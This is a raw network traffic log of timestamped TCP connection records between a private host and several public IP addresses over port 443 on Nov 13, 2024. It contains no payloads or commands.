                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.991780996 CET4434981599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.991914034 CET49815443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.994306087 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.994529009 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.994551897 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.994884968 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.995187998 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.995246887 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.995347023 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.999604940 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.035326958 CET4434981599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.043333054 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073759079 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073771954 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073812008 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073828936 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073849916 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073853016 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073870897 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073874950 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073883057 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073889971 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.073911905 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077631950 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077642918 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077677965 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077683926 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077708960 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077713013 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077733040 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077735901 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077784061 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.077784061 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.129654884 CET44349824162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.130064964 CET49824443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.130080938 CET44349824162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.131530046 CET44349824162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.131608009 CET49824443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.131969929 CET49824443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.132049084 CET44349824162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.132158995 CET49824443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.132168055 CET44349824162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.173636913 CET49824443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193694115 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193707943 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193763018 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193772078 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193797112 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193808079 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193819046 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193820000 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193855047 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193964958 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.193990946 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.196336985 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.196356058 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.196397066 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.196404934 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.196430922 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.199836016 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.199851036 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.199903965 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.199909925 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.208337069 CET44349817172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.208647966 CET49817443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.208662033 CET44349817172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.209681988 CET44349817172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.209747076 CET49817443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.210062027 CET49817443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.210124016 CET44349817172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.210225105 CET49817443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.248790026 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.252582073 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.252615929 CET49817443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.252635956 CET44349817172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.300600052 CET49817443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.301150084 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.303150892 CET44349824162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.303587914 CET44349824162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.303746939 CET49824443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.304908037 CET49824443192.168.2.17162.241.85.172
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.304932117 CET44349824162.241.85.172192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.311311007 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.311358929 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.311393976 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.311414957 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.311425924 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.311430931 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.311465979 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.312143087 CET49813443192.168.2.17143.204.98.11
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.312158108 CET44349813143.204.98.11192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.320188999 CET49837443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.320224047 CET4434983713.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.320306063 CET49837443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.320959091 CET49837443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.320966959 CET4434983713.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.324486017 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.324516058 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.324605942 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.324800968 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.324820042 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.342297077 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.342338085 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.342411041 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.342631102 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.342649937 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.373016119 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.373025894 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.373044014 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.373050928 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.373075962 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.373106956 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.373135090 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.373148918 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.373188019 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.377559900 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.377578020 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.377624989 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.377630949 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.377657890 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.377676010 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.414082050 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.414110899 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.414469957 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.414669037 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.414680958 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.435321093 CET44349818185.89.210.122192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.435497999 CET49818443192.168.2.17185.89.210.122
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.435523987 CET44349818185.89.210.122192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.437000036 CET44349818185.89.210.122192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.437076092 CET49818443192.168.2.17185.89.210.122
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.437792063 CET49818443192.168.2.17185.89.210.122
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.437887907 CET44349818185.89.210.122192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.437921047 CET49818443192.168.2.17185.89.210.122
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.438880920 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.439059973 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.439069986 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.439508915 CET4434982613.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.439768076 CET49826443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.439781904 CET4434982613.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.439934969 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.439984083 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.440246105 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.440303087 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.440337896 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.440340996 CET4434982613.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.440689087 CET49826443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.440772057 CET4434982613.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.440784931 CET49826443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.449538946 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.449866056 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.449888945 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.451297045 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.451364040 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.451759100 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.451834917 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.451915026 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.451920986 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.470396042 CET44349817172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.470446110 CET44349817172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.470603943 CET49817443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.470635891 CET44349817172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.471332073 CET49817443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.471381903 CET44349817172.217.18.4192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.471452951 CET49817443192.168.2.17172.217.18.4
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.479363918 CET44349818185.89.210.122192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.483338118 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.483341932 CET4434982613.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.491591930 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.491612911 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.491646051 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.491868973 CET49818443192.168.2.17185.89.210.122
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.491877079 CET44349818185.89.210.122192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.491883993 CET49826443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.496634960 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.496655941 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.496727943 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.496738911 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.496795893 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.498863935 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.498894930 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.498925924 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.498930931 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.498974085 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.500808001 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.500823021 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.500876904 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.500881910 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.500921011 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.504172087 CET49842443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.504215956 CET4434984291.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.504650116 CET49842443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.504967928 CET49842443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.504987955 CET4434984291.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.538583994 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.540963888 CET49818443192.168.2.17185.89.210.122
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.619172096 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.619195938 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.619262934 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.619280100 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.619306087 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.619329929 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.620001078 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.620066881 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.620070934 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.620079994 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.620109081 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.621248960 CET49814443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.621262074 CET4434981499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.679685116 CET44349818185.89.210.122192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.679950953 CET44349818185.89.210.122192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.680021048 CET49818443192.168.2.17185.89.210.122
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.680807114 CET49818443192.168.2.17185.89.210.122
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.680823088 CET44349818185.89.210.122192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.691770077 CET49846443192.168.2.17185.89.210.141
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.691806078 CET44349846185.89.210.141192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.691894054 CET49846443192.168.2.17185.89.210.141
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.692137003 CET49846443192.168.2.17185.89.210.141
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.692152023 CET44349846185.89.210.141192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.719996929 CET4434982613.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.720180988 CET4434982613.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.720261097 CET49826443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.720679045 CET49826443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.720698118 CET4434982613.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.724782944 CET49847443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.724808931 CET4434984713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.724919081 CET49847443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.725189924 CET49847443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.725203991 CET4434984713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.730658054 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.730669022 CET44349848150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.730767965 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.730984926 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.730994940 CET44349848150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.784538031 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.784553051 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.784770012 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.785003901 CET49850443192.168.2.17104.26.5.39
